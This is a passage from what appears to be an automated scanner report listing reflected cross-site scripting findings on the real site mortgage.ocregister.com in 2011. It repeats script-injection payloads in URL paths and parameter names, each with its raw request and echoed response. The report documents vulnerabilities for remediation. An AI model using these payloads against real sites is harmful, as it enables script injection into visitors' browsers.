<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200752dcb\"><script>alert(1)</script>39ced908d26/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b0a6"><script>alert(1)</script>92197aa8e9d was submitted in the REST URL parameter 2. This input was echoed as 6b0a6\"><script>alert(1)</script>92197aa8e9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/026b0a6"><script>alert(1)</script>92197aa8e9d/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:15:06 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:15:06 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/026b0a6\"><script>alert(1)</script>92197aa8e9d/feed/" /> ...[SNIP]...
1.212. http://mortgage.ocregister.com/2007/02/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2007/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3653d"><script>alert(1)</script>5061bfdeb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3653d\"><script>alert(1)</script>5061bfdeb82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/02/?3653d"><script>alert(1)</script>5061bfdeb82=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/02/?3653d\"><script>alert(1)</script>5061bfdeb82=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b96d6"><script>alert(1)</script>608b7c95f14 was submitted in the REST URL parameter 1. This input was echoed as b96d6\"><script>alert(1)</script>608b7c95f14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007b96d6"><script>alert(1)</script>608b7c95f14/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007b96d6\"><script>alert(1)</script>608b7c95f14/03/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 832cb"><script>alert(1)</script>2b5aea2aeb2 was submitted in the REST URL parameter 2. This input was echoed as 832cb\"><script>alert(1)</script>2b5aea2aeb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/03832cb"><script>alert(1)</script>2b5aea2aeb2/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03832cb\"><script>alert(1)</script>2b5aea2aeb2/feed/" /> ...[SNIP]...
1.215. http://mortgage.ocregister.com/2007/03/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10aad"><script>alert(1)</script>8ad5229eab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 10aad\"><script>alert(1)</script>8ad5229eab7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/03/?10aad"><script>alert(1)</script>8ad5229eab7=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/03/?10aad\"><script>alert(1)</script>8ad5229eab7=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55996"><script>alert(1)</script>f21c39f9bf3 was submitted in the REST URL parameter 1. This input was echoed as 55996\"><script>alert(1)</script>f21c39f9bf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200755996"><script>alert(1)</script>f21c39f9bf3/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200755996\"><script>alert(1)</script>f21c39f9bf3/04/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ffb"><script>alert(1)</script>43052a33670 was submitted in the REST URL parameter 2. This input was echoed as 96ffb\"><script>alert(1)</script>43052a33670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/0496ffb"><script>alert(1)</script>43052a33670/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/0496ffb\"><script>alert(1)</script>43052a33670/feed/" /> ...[SNIP]...
1.218. http://mortgage.ocregister.com/2007/04/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/04/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74dd0"><script>alert(1)</script>2eca39d79aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74dd0\"><script>alert(1)</script>2eca39d79aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/04/?74dd0"><script>alert(1)</script>2eca39d79aa=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86567
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/04/?74dd0\"><script>alert(1)</script>2eca39d79aa=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a5d1"><script>alert(1)</script>84bac8fb2df was submitted in the REST URL parameter 1. This input was echoed as 7a5d1\"><script>alert(1)</script>84bac8fb2df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20077a5d1"><script>alert(1)</script>84bac8fb2df/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20077a5d1\"><script>alert(1)</script>84bac8fb2df/05/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5186"><script>alert(1)</script>5f95e6db221 was submitted in the REST URL parameter 2. This input was echoed as e5186\"><script>alert(1)</script>5f95e6db221 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/05e5186"><script>alert(1)</script>5f95e6db221/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:04 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05e5186\"><script>alert(1)</script>5f95e6db221/feed/" /> ...[SNIP]...
1.221. http://mortgage.ocregister.com/2007/05/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/05/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb37e"><script>alert(1)</script>c34013ed727 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cb37e\"><script>alert(1)</script>c34013ed727 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/05/?cb37e"><script>alert(1)</script>c34013ed727=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/05/?cb37e\"><script>alert(1)</script>c34013ed727=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d840"><script>alert(1)</script>d1f9139be71 was submitted in the REST URL parameter 1. This input was echoed as 4d840\"><script>alert(1)</script>d1f9139be71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20074d840"><script>alert(1)</script>d1f9139be71/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20074d840\"><script>alert(1)</script>d1f9139be71/06/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a890"><script>alert(1)</script>7c589308949 was submitted in the REST URL parameter 2. This input was echoed as 2a890\"><script>alert(1)</script>7c589308949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/062a890"><script>alert(1)</script>7c589308949/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/062a890\"><script>alert(1)</script>7c589308949/feed/" /> ...[SNIP]...
1.224. http://mortgage.ocregister.com/2007/06/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/06/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 194ec"><script>alert(1)</script>237ccbfc119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 194ec\"><script>alert(1)</script>237ccbfc119 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/06/?194ec"><script>alert(1)</script>237ccbfc119=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/06/?194ec\"><script>alert(1)</script>237ccbfc119=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d23d"><script>alert(1)</script>6e84ace3326 was submitted in the REST URL parameter 1. This input was echoed as 8d23d\"><script>alert(1)</script>6e84ace3326 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20078d23d"><script>alert(1)</script>6e84ace3326/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
